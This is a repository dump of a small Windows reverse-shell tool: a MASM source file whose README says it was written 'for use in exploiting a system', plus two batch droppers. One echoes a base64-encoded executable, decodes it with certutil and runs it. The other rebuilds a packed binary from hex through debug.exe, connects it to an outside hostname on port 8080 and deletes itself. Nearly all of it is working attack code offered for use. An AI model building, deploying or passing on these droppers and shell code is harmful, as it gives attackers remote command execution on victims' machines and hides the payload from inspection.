├── .gitattributes ├── Readme.md ├── minireverse.asm ├── .gitignore ├── base64.bat └── reverse.bat /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | ## Account moved to: https://gitlab.com/illwill 2 | 3 | 4 | º File : Mini Reverse Shell 5 | º Language : Win32 ASM 6 | º FileSize : 2kb 7 | º D.O.B. : February 23, 2006 8 | º Description: CMD line reverse shell in masm that shovels a shell back to your host:port from a batfile 9 | 10 | I made this in 2006 for use in exploiting a system, once executed this shovels a CMD shell back to 11 | the attacker's netcat listener 12 | 13 | 14 | How Compile: 15 | Get MASM installed 16 | From a CMD Prompt type the following: 17 | 18 | c:\masm32\bin\ml /c /coff reverseshell.asm 19 | 20 | c:\masm32\bin\link /SUBSYSTEM:WINDOWS /RELEASE /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.idata=.text /SECTION:.text,EWR /FILEALIGN:512 reverseshell.obj 21 | 22 | 23 | dont forget to change the ip address in the batfile 24 | -------------------------------------------------------------------------------- /minireverse.asm: -------------------------------------------------------------------------------- 1 | ; minireverse.asm 2 | ; by illwill 3 | ; feb 23,2006 4 | ; spits back a cmd shell to your ip on your defined port 5 | 6 | .386 7 | .model flat, stdcall 8 | option casemap:none 9 | include \masm32\include\windows.inc 10 | include \masm32\include\kernel32.inc 11 | include \masm32\include\ws2_32.inc 12 | include \masm32\include\masm32.inc 13 | includelib \masm32\lib\ws2_32.lib 14 | includelib \masm32\lib\kernel32.lib 15 | includelib \masm32\lib\masm32.lib 16 | 17 | .data 18 | cmd db "cmd",0 19 | .data? 20 | sinfo STARTUPINFO<> 21 | pi PROCESS_INFORMATION<> 22 | sin sockaddr_in<> 23 | WSAD WSADATA<> 24 | Wsocket dd ? 25 | IP db 50 dup (?) 26 | port db 8 dup (?) 27 | .code 28 | start: 29 | invoke GetCL,1,addr IP 30 | invoke StdOut,addr IP 31 | invoke GetCL,2,addr port 32 | invoke StdOut,addr port 33 | invoke WSAStartup, 101h, addr WSAD 34 | invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 35 | mov Wsocket, eax 36 | mov sin.sin_family, 2 37 | invoke atodw, addr port 38 | invoke htons, eax 39 | mov sin.sin_port, ax 40 | invoke gethostbyname, addr IP 41 | mov eax, [eax+12] 42 | mov eax, [eax] 43 | mov eax, [eax] 44 | mov sin.sin_addr, eax 45 | 46 | mov eax,Wsocket 47 | mov sinfo.hStdInput,eax 48 | mov sinfo.hStdOutput,eax 49 | mov sinfo.hStdError,eax 50 | mov sinfo.cb,sizeof STARTUPINFO 51 | mov sinfo.dwFlags,STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES 52 | invoke connect, Wsocket, addr sin , sizeof(sockaddr_in) 53 | invoke CreateProcess,NULL,addr cmd,NULL,NULL,TRUE,8000040h,NULL,NULL,addr sinfo,addr pi 54 | ret 55 | end start -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | 5 | *.pydevproject 6 | .project 7 | .metadata 8 | bin/ 9 | tmp/ 10 | *.tmp 11 | *.bak 12 | *.swp 13 | *~.nib 14 | local.properties 15 | .classpath 16 | .settings/ 17 | .loadpath 18 | 19 | # External tool builders 20 | .externalToolBuilders/ 21 | 22 | # Locally stored "Eclipse launch configurations" 23 | *.launch 24 | 25 | # CDT-specific 26 | .cproject 27 | 28 | # PDT-specific 29 | .buildpath 30 | 31 | 32 | ################# 33 | ## Visual Studio 34 | ################# 35 | 36 | ## Ignore Visual Studio temporary files, build results, and 37 | ## files generated by popular Visual Studio add-ons. 38 | 39 | # User-specific files 40 | *.suo 41 | *.user 42 | *.sln.docstates 43 | 44 | # Build results 45 | [Dd]ebug/ 46 | [Rr]elease/ 47 | *_i.c 48 | *_p.c 49 | *.ilk 50 | *.meta 51 | *.obj 52 | *.pch 53 | *.pdb 54 | *.pgc 55 | *.pgd 56 | *.rsp 57 | *.sbr 58 | *.tlb 59 | *.tli 60 | *.tlh 61 | *.tmp 62 | *.vspscc 63 | .builds 64 | *.dotCover 65 | 66 | ## TODO: If you have NuGet Package Restore enabled, uncomment this 67 | #packages/ 68 | 69 | # Visual C++ cache files 70 | ipch/ 71 | *.aps 72 | *.ncb 73 | *.opensdf 74 | *.sdf 75 | 76 | # Visual Studio profiler 77 | *.psess 78 | *.vsp 79 | 80 | # ReSharper is a .NET coding add-in 81 | _ReSharper* 82 | 83 | # Installshield output folder 84 | [Ee]xpress 85 | 86 | # DocProject is a documentation generator add-in 87 | DocProject/buildhelp/ 88 | DocProject/Help/*.HxT 89 | DocProject/Help/*.HxC 90 | DocProject/Help/*.hhc 91 | DocProject/Help/*.hhk 92 | DocProject/Help/*.hhp 93 | DocProject/Help/Html2 94 | DocProject/Help/html 95 | 96 | # Click-Once directory 97 | publish 98 | 99 | # Others 100 | [Bb]in 101 | [Oo]bj 102 | sql 103 | TestResults 104 | *.Cache 105 | ClientBin 106 | stylecop.* 107 | ~$* 108 | *.dbmdl 109 | Generated_Code #added for RIA/Silverlight projects 110 | 111 | # Backup & report files from converting an old project file to a newer 112 | # Visual Studio version. Backup files are not needed, because we have git ;-) 113 | _UpgradeReport_Files/ 114 | Backup*/ 115 | UpgradeLog*.XML 116 | 117 | 118 | 119 | ############ 120 | ## Windows 121 | ############ 122 | 123 | # Windows image file caches 124 | Thumbs.db 125 | 126 | # Folder config file 127 | Desktop.ini 128 | 129 | 130 | ############# 131 | ## Python 132 | ############# 133 | 134 | *.py[co] 135 | 136 | # Packages 137 | *.egg 138 | *.egg-info 139 | dist 140 | build 141 | eggs 142 | parts 143 | bin 144 | var 145 | sdist 146 | develop-eggs 147 | .installed.cfg 148 | 149 | # Installer logs 150 | pip-log.txt 151 | 152 | # Unit test / coverage reports 153 | .coverage 154 | .tox 155 | 156 | #Translations 157 | *.mo 158 | 159 | #Mr Developer 160 | .mr.developer.cfg 161 | 162 | # Mac crap 163 | .DS_Store 164 | -------------------------------------------------------------------------------- /base64.bat: -------------------------------------------------------------------------------- 1 | echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ 0KJAAAAAAAAADhshgBpdN2UqXTdlKl03ZSK8xlUqvTdlJZ82RSoNN2UlJpY2il03ZSAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAUEUAAEwBAwDcj8BeAAAAAAAAAADgAA8BCwEFDAAEAAAABgAAAAAAAAAQAAAA EAAAACAAAAAAQAAAEAAAAAIAAAQAAAAEAAAABAAAAAAAAAAAQAAAAAQAAK21AAADAAAAAAAQAAAQAAA AABAAABAAAAAAAAAQAAAAAAAAAAAAAAAsIAAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACwAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAABQDAAAAEAAAAAQAAAAEAAAAAAAAAAAAAAAA AAAgAABgLnJkYXRhAAAsAQAAACAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAQAIAAAA wAAAAAgAAAAoAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAGgGMkAAagHoAAEAAGgGMkAA6EICAABoODJAAGoC6OoAAABoODJAAOgsAg AAaHQwQABoAQEAAOixAAAAagBqAGoAagZqAWoC6JoAAACjAjJAAGbHBWQwQAACAGg4MkAA6LwBAABQ6 JQAAABmo2YwQABoBjJAAOh+AAAAi0AMiwCLAKNoMEAAoQIyQACjSDBAAKNMMEAAo1AwQADHBRAwQABE AAAAxwU8MEAAAQEAAGoQaGQwQAD/NQIyQADoMgAAAGhUMEAAaBAwQABqAGoAaEAAAAhqAWoAagBoADB AAGoA6B8AAADD/yUkIEAA/yUcIEAA/yUYIEAA/yUUIEAA/yUgIEAA/yUIIEAAzMxVi+yBxHz+//9WV+ jmAQAAiUX8M8mLdfysPAB0BzwidfdB6/RR0enR4Vg7wXQLX164AwAAAMnCCACLdfyNvTz///+sPAB0C TwJdQKwIKrr8qqNhTz///+L8Iv4rDwAdQLrGzwidQOq6wOq6++sPCB1ArD+PCJ1A6rr4arr76qNhTz/ //+L8I29fP7//7kAAAAArDwgdPs7TQh0Faw8AHQdPCB1Cqw8IHT7QTwAdA/r5qqsPCB0BzwAdAOq6/S wAKo7TQhzEYt9DLAAqrgCAAAAX17JwggAjYV8/v//i/CLfQysPAB0DTwidPc8/nUCsCCq6+6qi3UMrD wAdQtfXrgEAAAAycIIALgBAAAAX17JwggAzMxVi+xWVzPAi3UIM8kz0ooGRjwCdRKKBvfSRusLLDCND ImNDEiKBkYKwHXxjQQRM8JfXsnCBADMzFWL7IPE9Gr16KMAAACJRfz/dQjoIAAAAIlF9GoAjUX4UP91 9P91CP91/OiHAAAAi0X4ycIEAMzMi0QkBI1QA1VXvYCAgICLOIPABI2P//7+/vfXI88jzXU5iziDwAS Nj//+/v731yPPI811Jos4g8AEjY///v7+99cjzyPNdROLOIPABI2P//7+/vfXI88jzXS098GAgAAAdQ bB6RCDwALQ4RvCX13CBADM/yUEIEAA/yUMIEAA/yUAIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgIQAA/iAAAN4gAAAQIQAAAAAAALogAACwI AAAoiAAAMogAACUIAAAAAAAAHwgAAAAAAAAAAAAANIgAAAUIAAAaCAAAAAAAAAAAAAA8CAAAAAgAAAA AAAAAAAAAAAAAAAAAAAAAAAAACAhAAD+IAAA3iAAABAhAAAAAAAAuiAAALAgAACiIAAAyiAAAJQgAAA AAAAAQQBXU0FTb2NrZXRBAABDAFdTQVN0YXJ0dXAAAFYAY29ubmVjdABaAGdldGhvc3RieW5hbWUAZQ BodG9ucwB3czJfMzIuZGxsAABPAENyZWF0ZVByb2Nlc3NBAABrZXJuZWwzMi5kbGwAAOYAR2V0Q29tb WFuZExpbmVBAGoBR2V0U3RkSGFuZGxlAAD3AldyaXRlRmlsZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAGNtZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >b.64 | certutil -decode b.64 r.exe && r 127.0.0.1 443 2 | -------------------------------------------------------------------------------- /reverse.bat: -------------------------------------------------------------------------------- 1 | echo off && echo n 1.dll >123.hex 2 | echo e 0100 >>123.hex && echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 >>123.hex 3 | echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex 4 | echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13 >>123.hex 5 | echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00 >>123.hex 6 | echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1 >>123.hex 7 | echo e 0380 >>123.hex && echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03 >>123.hex 8 | echo e 0400 >>123.hex && echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee >>123.hex 9 | echo e 0480 >>123.hex && echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74 >>123.hex 10 | echo e 0500 >>123.hex && echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46 >>123.hex 11 | echo e 0580 >>123.hex && echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00 >>123.hex 12 | echo r cx >>123.hex && echo 04ef >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll reverse.exe && del 1.dll && del 123.hex 13 | rem *******************EDIT YOUR HOSTNAME AND PORT HERE************************* 14 | reverse.exe illwill.reverse-dns.com 8080 15 | deleteit: 16 | del reverse.exe 17 | IF EXIST reverse.exe GOTO kill 18 | del %0 19 | 20 | --------------------------------------------------------------------------------